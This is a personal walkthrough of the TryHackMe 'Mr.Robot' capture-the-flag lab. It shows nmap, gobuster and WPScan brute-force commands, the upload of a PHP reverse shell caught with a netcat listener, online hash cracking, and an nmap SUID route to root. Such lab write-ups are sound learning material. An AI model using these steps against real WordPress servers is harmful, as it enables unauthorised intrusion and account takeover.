TryHackMe -Mr.Robot
This is my 16th write up and I will be discussing my experience with the machine “Mr.Robot” from TryHackMe. TryHackMe is a great platform for people who are starting out in the InfoSec field and want to sharpen their skills in networking, Linux, hacking, etc. The platform is very hands on with their training material and keeps it fun for learners. This was a cool challenge and was created based off of one of my favorite TV shows “Mr. Robot”. A Wordpress account bruteforce lands you into the Elliot’s admin panel allowing a php-reverse-shell to be uploaded with a low end user account. Nmap then has a bug which allows a privilege escalation to root.
Step 1: Enumeration
When conducting a penetration test there are mainly 5 phases in hacking. You don’t need to necessarily follow these 5 steps in a sequential manner. It’s a stepwise process and when followed yields a better result. I started off with an Nmap scan against this machine to see what ports/versions were exposed and decided there was no need for second scan type. It does not hurt to run two different types of Nmap scans because one scan may provide you more results than the other depending on the flags used. The scan I kicked off first used default scripts -sC and version detection -sV flags. If it is your first time learning about Nmap I would checkout HackerSploits YouTube tutorials.
sinner@kali:~$ sudo nmap -sC -sV 10.10.192.59
[sudo] password for sinner:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-03 12:24 EDT
Nmap scan report for 10.10.192.59
Host is up (0.25s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp closed http
443/tcp closed httpsService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.26 seconds
Nmap places ports in this state when it is unable to determine whether a port is open or filtered. Usually the reason a port will appear as closed is that there is a no service listening on it but the firewall is not filtering access to the port. I started off with visiting port 80 by entering the boxes IP in my web browser.
A Mr.Robot style intro kicked off in the web browser interface felt like I was in the show for a second.. I proceeded with some further enumeration of the web pages to see what I can land on. First page I like to visit is the robots.txt file by appending /robots.txt to the URL address.
Robots.txt can give an attacker some good information like what pages/files can be accessed. In this case you can see fsocity.dic and one of the flags key-1-of-3.txt. I pulled these files down using wget onto my machine.
Example:
typing the following in a terminal
wget http://10.10.192.59/robots.txtNow that I have the first flag I needed two more to complete this box. The second file was interesting because it contained what looks like potential usernames/passwords. I looked at the word count of this file and it was large!
The file needed some cleanup because of duplicates so I ran the following command and verified the wordcount again this time it was less than the original.
Now that the file was cleaned up and ready for use I needed to find a page that I could bruteforce with the wordlist. I ran a directory busting tool to locate other hidden pages.
Example:
directory busting tool example command:
gobuster dir -u http://10.10.192.59/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txtResults:
Visited /wp-admin by appending it to the URL and was presented with a Wordpress login page.
There are many tools available for bruteforcing log in pages. I chose to use WPScan’s built in bruteforcing tool and ran the following command:
wpscan --url http://10.10.89.214 -t 50 -U elliot -P /home/kali/Documents/tryhackme/mr-robot/fsociety.txt
I guessed the username to be elliot and got lucky. The best way to approach this is by trying the usernames as the passwords in the wordlist file with a tool like either hydra or metasploit.
Used the discovered credentials to log into Elliot’s Wordpress account.
Step 2: Exploitation
Browsing around I noticed that you can upload your own theme. We know the platform is written in PHP so I created a php-reverse-shell file and uploaded it. I saw others do this from editing the themes code and pasting it but I was able to get it to execute from the posts section by attaching a media file which in this case was my php shell file.
You can find the php-reverse-shell template in kali. Edits needed to be made in the file to include your IP and desired port to connect back on once the file is executed on the server.
In my terminal I set up a Netcat listner to grab the connection once the file was uploaded and executed.
nc -lvp 6666Going back to the Wordpress panel I uploaded my shell in the themes section then opened it in the edit post section when uploading it as media file.
As soon as I hit the post button the shell connected back to my machine as a low level shell.
Looking around the directories I peeked into /home and saw that there was a local user account called ‘robot’. Peeking further I saw two files in that user’s home directory with one of them being the next flag. Unfortunately it seemed that only the user ‘robot’ has permissions to read that file.
The second file was interesting not only because it’s called “password” but also appears to be world-readable. Taking the filename at face value it looks like it was an md5 hash of the user’s password 🤔
I used the easy way out instead of getting fancy and using hash cracking tools I uploaded the hash to crackstation’s website:
Now that I had the password I did a su to the robot user and grab the next flag.
The last flag for most challenges are almost always in the /root directory but only the root user has access to that directory. A very common way of escalating privileges on a Linux system is to look for binaries that have the SUID bit set and abusing them.
Identifying which one to use generally comes down to experience and practice.
Doing some research I found a GTFO bins for nmap allowing a privilege escalation to root.
